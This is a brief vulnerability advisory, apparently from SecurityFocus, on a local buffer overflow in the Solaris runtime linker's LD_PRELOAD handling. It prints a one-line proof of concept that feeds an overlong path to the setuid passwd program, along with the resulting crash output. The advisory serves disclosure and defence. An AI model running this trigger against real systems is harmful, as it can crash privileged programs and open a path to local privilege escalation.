Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow Vulnerability

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept has been supplied:

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning /AAAAAAA ... AAAAA/: open failed: illegal insecure pathname
Segmentation Fault (core dumped)

Two exploits have also been released.


 

Copyright 2010, SecurityFocus